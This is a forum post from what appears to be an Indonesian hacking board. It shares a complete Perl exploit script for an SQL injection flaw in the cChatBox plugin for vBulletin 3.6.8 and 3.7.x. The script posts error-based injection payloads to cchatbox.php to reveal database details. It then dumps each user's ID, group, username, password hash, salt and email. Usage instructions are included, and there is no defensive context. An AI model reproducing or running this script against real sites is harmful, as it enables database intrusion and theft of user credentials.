.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability

Go down 
PengirimMessage
X-h4ck
NuuBiiTooL
NuuBiiTooL
X-h4ck


Jumlah posting : 11
Points : 33
Reputation : 0
Join date : 09.07.11

cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability  Empty
PostSubyek: cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability    cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability  Icon_minitimeSun Dec 04, 2011 12:02 pm

Quote :
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$ua->agent("MyApp/0.1 ");
print "##################################\n";
print "############ EXPLOIT #############\n";
print "##################################\n";
print "## Portal: X-h4ck ##\n";
print "## Bug: SQLI ##\n";
print "## Author: DSecurity ##\n";
print "## Coder: vv0lll ##\n";
print "##################################\n";

print "Use: exploit.pl address number_user sleeptime\n";
print "Example: exploit.pl http://localhost/vbb 10 10\n";
if(@ARGV < 2) {exit;}
print "\n\n================================================\n";
#Foot print
print v_request('MySQL version: ','@@version');
print v_request('Data dir: ','@@datadir');
print v_request('User: ','user()');
print v_request('Database: ','database()');

#Get user
for($i=1;$i<=$ARGV[1];$i++){
print "-----------------------------------------\n";
print $id = v_request('ID: ','userid','user','1',$i-1);
if($id =~ /(ID:)\s(.*)/){
print v_request('Group: ','usergroupid','user','userid='.$2);
print v_request('Username: ','username','user','userid='.$2);
print v_request('Password: ','password','user','userid='.$2);
print v_request('Salt: ','salt','user','userid='.$2);
print v_request('Email: ','email','user','userid='.$2);
}

}

print $ARVG[0];
sub v_request{
#Declare
$print = $_[0];
$select = $_[1];
$from = $_[2];
$where = $_[3];
$limit = $_[4];
$sleep = $ARGV[2];
if ($from eq '') {$from = 'information_schema.tables';}
if ($where eq '') {$where = '1';}
if ($limit eq '') {$limit = '0';}
if ($sleep eq '') {$sleep = '10';}

# Create a request
my $req = HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');
$req->content_type('application/x-www-form-urlencoded');
$req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);
#print $res->content;
if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
{$test = $3};
sleep($sleep);
return $print.$test."\n";
}
Kembali Ke Atas Go down
 
cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Miibeian - SQL Injection Vulnerability
» XLAgenda : SQL injection vulnerability
» eNdonesia 8.3 SQL Injection Vulnerability
» WEBANDHOST CMS SQL Injection Vulnerability
» PhotoPost PHP SQL Injection Vulnerability

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: